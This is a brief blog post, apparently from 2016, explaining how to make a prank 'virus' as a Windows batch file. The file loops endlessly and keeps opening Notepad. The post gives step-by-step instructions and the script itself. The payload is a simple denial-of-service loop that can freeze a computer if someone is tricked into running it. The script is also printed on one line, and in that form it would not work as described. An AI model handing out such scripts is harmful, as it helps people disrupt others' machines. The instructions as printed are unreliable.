17 January, 2016

How To Create Virus That Continuosly Opens Notepad


How To Create Virus That Continuously Opens Notepad

1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

3. Now Save the file with an extensiom .bat , for example: notepad.bat
4. If you click on notepad .bat , notepad will be opening continuously.


TO STOP THIS; JUST DELETE THE FILE

No comments:

ads